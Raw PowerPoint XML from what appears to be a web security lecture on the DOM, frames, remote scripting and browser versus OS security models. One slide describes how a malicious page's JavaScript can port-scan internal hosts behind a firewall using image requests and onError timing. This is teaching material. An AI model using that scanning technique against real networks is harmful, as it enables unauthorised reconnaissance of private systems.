            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;  	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t> so = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>SWFObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//site.com/flash.swf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>', …); 			 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>so.addParam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>allowscriptaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>',  ‘always'); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>		 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>so.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>flashdiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>');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1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>	&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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r>
              <a:rPr lang="en-US"/>
              <a:t>Document Object Model (DOM)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133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Object-oriented interface used to read and write docs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>web page in HTML is structured data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DOM provides representation of this hierarchy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Examples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869406"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Properties:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> document.alinkColor, document.URL, document.forms[ ], document.links[ ], document.anchors[ ]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869406"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Methods:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  document.write(document.referrer)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Also Browser Object Model (BOM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>window, document, frames[], history, location, navigator (type and version of browser)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 scanning behind firewall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/>
              <a:t>JavaScript can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Request images from internal IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Example:  &lt;img src=“192.168.0.4:8080”/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Use timeout/onError to determine success/failure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Fingerprint webapps using known image names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50180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040188"/>
            <a:ext cx="243681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3975100" y="3883025"/>
            <a:ext cx="46038" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:pr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12800" y="3698875"/>
            <a:ext cx="909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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50183" name="Picture 8" descr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0363" y="4279900"/>
            <a:ext cx="1487487" cy="11382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5459413" y="4478338"/>
            <a:ext cx="1387475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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web page</a:t>
            </a:r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4211638" y="6477000"/>
            <a:ext cx="1046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Firewall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700338" y="3771900"/>
            <a:ext cx="3781425" cy="650875"/>
            <a:chOff x="1760" y="2186"/>
            <a:chExt cx="2382" cy="410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50206" name="Freeform 12"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1760" y="2364"/>
              <a:ext cx="1605" cy="232"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1197"/>
                <a:gd name="T1" fmla="*/ 1280 h 211"/>
                <a:gd name="T2" fmla="*/ 168353 w 1197"/>
                <a:gd name="T3" fmla="*/ 5 h 211"/>
                <a:gd name="T4" fmla="*/ 315092 w 1197"/>
                <a:gd name="T5" fmla="*/ 1098 h 211"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1197"/>
                <a:gd name="T10" fmla="*/ 0 h 211"/>
                <a:gd name="T11" fmla="*/ 1197 w 1197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7" h="211">
                  <a:moveTo>
                    <a:pt x="0" y="211"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="110"/>
                    <a:pt x="441" y="10"/>
                    <a:pt x="640" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="839" y="0"/>
                    <a:pt x="1018" y="90"/>
                    <a:pt x="1197" y="18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Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2664" y="2186"/>
              <a:ext cx="1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1) “show me dancing pigs!”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297113" y="4332288"/>
            <a:ext cx="2976562" cy="709612"/>
            <a:chOff x="1506" y="2539"/>
            <a:chExt cx="1875" cy="447"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50204" name="Freeform 14"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1858" y="2539"/>
              <a:ext cx="1523" cy="212"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1544"/>
                <a:gd name="T1" fmla="*/ 4836 h 176"/>
                <a:gd name="T2" fmla="*/ 585 w 1544"/>
                <a:gd name="T3" fmla="*/ 186 h 176"/>
                <a:gd name="T4" fmla="*/ 1190 w 1544"/>
                <a:gd name="T5" fmla="*/ 6030 h 176"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1544"/>
                <a:gd name="T10" fmla="*/ 0 h 176"/>
                <a:gd name="T11" fmla="*/ 1544 w 154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4" h="176">
                  <a:moveTo>
                    <a:pt x="0" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="70"/>
                    <a:pt x="502" y="0"/>
                    <a:pt x="759" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1016" y="12"/>
                    <a:pt x="1280" y="94"/>
                    <a:pt x="1544" y="1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1506" y="2813"/>
              <a:ext cx="10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2) “check this out”</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50188" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5599113" y="5387975"/>
            <a:ext cx="1100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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50189" name="Picture 17" descr="cisco-520-2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0288" y="5807075"/>
            <a:ext cx="14255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53250" y="2874963"/>
            <a:ext cx="1855788" cy="1420812"/>
            <a:chOff x="4439" y="1621"/>
            <a:chExt cx="1169" cy="895"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50201" name="Picture 11" descr="CompaqAlphaServerES4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80" y="1621"/>
              <a:ext cx="728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2" name="Line 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4439" y="2054"/>
              <a:ext cx="3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Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4541" y="2204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000">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scan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981825" y="4876800"/>
            <a:ext cx="1751013" cy="1436688"/>
            <a:chOff x="4457" y="2882"/>
            <a:chExt cx="1103" cy="905"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50198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55" y="2882"/>
              <a:ext cx="905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9" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4504" y="3017"/>
              <a:ext cx="34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Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4457" y="3152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000">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scan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826000" y="5535613"/>
            <a:ext cx="666750" cy="384175"/>
            <a:chOff x="3048" y="3297"/>
            <a:chExt cx="473" cy="383"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50196" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3048" y="3297"/>
              <a:ext cx="36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Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3208" y="3435"/>
              <a:ext cx="313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000">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scan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146300" y="5214938"/>
            <a:ext cx="3173413" cy="593725"/>
            <a:chOff x="1411" y="3095"/>
            <a:chExt cx="1999" cy="374"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50194" name="Freeform 32"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1887" y="3095"/>
              <a:ext cx="1523" cy="212"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1544"/>
                <a:gd name="T1" fmla="*/ 4836 h 176"/>
                <a:gd name="T2" fmla="*/ 585 w 1544"/>
                <a:gd name="T3" fmla="*/ 186 h 176"/>
                <a:gd name="T4" fmla="*/ 1190 w 1544"/>
                <a:gd name="T5" fmla="*/ 6030 h 176"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1544"/>
                <a:gd name="T10" fmla="*/ 0 h 176"/>
                <a:gd name="T11" fmla="*/ 1544 w 154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4" h="176">
                  <a:moveTo>
                    <a:pt x="0" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="70"/>
                    <a:pt x="502" y="0"/>
                    <a:pt x="759" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1016" y="12"/>
                    <a:pt x="1280" y="94"/>
                    <a:pt x="1544" y="1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33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1411" y="3296"/>
              <a:ext cx="12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3) port scan results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scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347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smtClean="0"/>
              <a:t>Goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Exchange data between a client-side app running in a browser and server-side app,  without reloading page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Java Applet/ActiveX control/Flash </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Can make HTTP requests and interact with client-side JavaScript code,  but requires LiveConnect (not available on all browsers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>XML-RPC </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>open, standards-based technology that requires XML-RPC libraries on server and in your client-side code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Simple HTTP via a hidden IFRAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>IFRAME with a script on your web server (or database of static HTML files) is by far the easiest of the three remote scripting options  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0"/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1515662" y="6443246"/>
            <a:ext cx="61805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See:  http://developer.apple.com/internet/webcontent/iframe.html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143000" y="5638800"/>
            <a:ext cx="6324600" cy="70788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Important </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Point: A web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can maintain bi-directional communication with browser (until user closes/quits)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Analogy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107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4040188" cy="639763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Operating system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47108" name="Content Placeholder 4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609600" y="1974969"/>
            <a:ext cx="4040188" cy="4197231"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Principals: Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Discretionary access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Root exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47109" name="Text Placeholder 7" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4797425" y="1371600"/>
            <a:ext cx="4041775" cy="639763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Web browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47110" name="Content Placeholder 5" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4797425" y="2011363"/>
            <a:ext cx="4041775" cy="3951287"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Document object model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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Cookies /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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Principals: “Origins”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mandatory access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cache history attacks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 and iFrame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371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/>
              <a:t>Window may contain frames from different sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Frame: rigid division as part of frameset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>iFrame: floating inline frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>iFrame example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Why use frames?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Delegate screen area to content from another source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Browser provides isolation based on frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Parent may work even if frame is broken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990600" y="3352800"/>
            <a:ext cx="68580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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>iframe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="hello.html" width=450 height=100&gt;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If you can see this, your browser doesn't understand IFRAME.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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800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895600" y="1976438"/>
            <a:ext cx="3276600" cy="391001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895600" y="3981450"/>
            <a:ext cx="533400" cy="190500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5638800" y="1976438"/>
            <a:ext cx="533400" cy="2157412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3317" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="1905000"/>
            <a:ext cx="170338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8" descr="Alice _8885 by Disney-Grandpa."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="160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Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6927850" y="4286250"/>
            <a:ext cx="21399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Network Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intercepts and controls network communication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13320" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="6267450"/>
            <a:ext cx="71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3321" name="Right Arrow 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="43434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2" name="Right Arrow 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2057400" y="52578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3" name="Right Arrow 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="2362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4" name="Right Arrow 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
